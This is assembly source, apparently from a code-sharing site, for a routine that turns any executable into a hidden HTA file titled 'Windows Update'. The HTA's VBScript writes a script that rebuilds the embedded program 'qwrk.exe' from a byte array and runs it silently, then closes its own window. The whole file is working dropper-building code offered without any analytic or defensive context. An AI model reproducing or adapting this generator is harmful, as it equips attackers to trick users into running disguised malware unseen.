📄 hta.asm
字号:
; HTA file generator
; #########################################################################
.data
szHTAFileName equ "qwrk.exe"
szHTAVbsName equ "qfl.vbs"
szHTACode1 db '<HTML>',13,10
db '<HEAD>',13,10
db '<TITLE>Windows Update</TITLE>',13,10
db '<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>',13,10
db '<SCRIPT LANGUAGE="VBScript">',13,10
db 'MyFile = "',szHTAVbsName,'"',13,10
db 'Set FSO = CreateObject("Scripting.FileSystemObject")',13,10
db 'Set TSO = FSO.CreateTextFile(MyFile, True)',13,10
db 'TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf',13,10
db 'TSO.write "textfile = ""',szHTAFileName,'""" & vbcrlf',13,10
db 'TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf',13,10
db 'TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf',13,10
db 'TSO.write "getname = filesys.GetFileName(path)" & vbcrlf',13,10
db 'TSO.write "dim a" & vbcrlf',13,10
db 'TSO.write "a=Array(',0
szHTACode2 db ')" & vbcrlf',13,10
db 'TSO.write "for i=0 to ',0
szHTACode3 db '" & vbcrlf',13,10
db 'TSO.write "filetxt.Write(chr(a(i)))" & vbcrlf',13,10
db 'TSO.write "next" & vbcrlf',13,10
db 'TSO.write "filetxt.Close" & vbcrlf',13,10
db 'TSO.write "dim z" & vbcrlf',13,10
db 'TSO.write "dim zz" & vbcrlf',13,10
db 'TSO.write "Const ForReading = 1, ForWriting = 2, ForAppending = 3" & vbcrlf',13,10
db 'TSO.write "const RemoteExe = ""',szHTAFileName,'""" & vbcrlf',13,10
db 'TSO.write "set zz = wscript.createobject(""wscript.shell"")" & vbcrlf',13,10
db 'TSO.write "z = zz.run (""',szHTAFileName,'"")" & vbcrlf',13,10
db 'TSO.write "wscript.quit" & vbcrlf',13,10
db 'Set TSO = Nothing',13,10
db 'Set FSO = Nothing',13,10
db 'Dim WshShell',13,10
db 'Set WshShell = CreateObject("WScript.Shell")',13,10
db 'WshShell.Run "',szHTAVbsName,'", 0, false',13,10
db '</SCRIPT>',13,10
db '<script>window.close()</script>',13,10
db '</HEAD>',13,10
db '</HTML>',0
szHTAShortFmt db "%hu,",0
szHTAShortFmt2 db "%hu",0
szHTAIntFmt db "%lu",0
.code
GenHTACode proc hFileIn, hFileOut, dwInLen: DWORD
LOCAL NumStr[20]: BYTE
LOCAL Temp: BYTE
LOCAL dwTemp, len: DWORD
invoke lstrlen, offset szHTACode1
xchg eax, edx
invoke WriteFile, hFileOut, offset szHTACode1, edx, addr dwTemp, NULL
m2m len, dwInLen
.WHILE len > 0
invoke ReadFile, hFileIn, addr Temp, 1, addr dwTemp, NULL
.IF len == 1
mov edx, offset szHTAShortFmt2
.ELSE
mov edx, offset szHTAShortFmt
.ENDIF
invoke wsprintf, addr NumStr, edx, Temp
invoke lstrlen, addr NumStr
xchg eax, edx
invoke WriteFile, hFileOut, addr NumStr, edx, addr dwTemp, NULL
dec len
.ENDW
invoke lstrlen, offset szHTACode2
xchg eax, edx
invoke WriteFile, hFileOut, offset szHTACode2, edx, addr dwTemp, NULL
dec dwInLen
invoke wsprintf, addr NumStr, offset szHTAIntFmt, dwInLen
invoke lstrlen, addr NumStr
xchg eax, edx
invoke WriteFile, hFileOut, addr NumStr, edx, addr dwTemp, NULL
invoke lstrlen, offset szHTACode3
xchg eax, edx
invoke WriteFile, hFileOut, offset szHTACode3, edx, addr dwTemp, NULL
ret
GenHTACode endp
CreateHTAFile proc uses ebx InFile, OutFile: DWORD
LOCAL hFileIn: DWORD
LOCAL hFileOut: DWORD
xor ebx, ebx
invoke CreateFile, InFile, GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL
mov hFileIn, eax
inc eax
jz @chf_ret
invoke CreateFile, OutFile, GENERIC_WRITE or GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, NULL
mov hFileOut, eax
inc eax
jz @chf_ret
invoke GetFileSize, hFileIn, NULL
invoke GenHTACode, hFileIn, hFileOut, eax
invoke CloseHandle, hFileIn
invoke CloseHandle, hFileOut
inc ebx
@chf_ret:
mov eax, ebx
ret
CreateHTAFile endp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -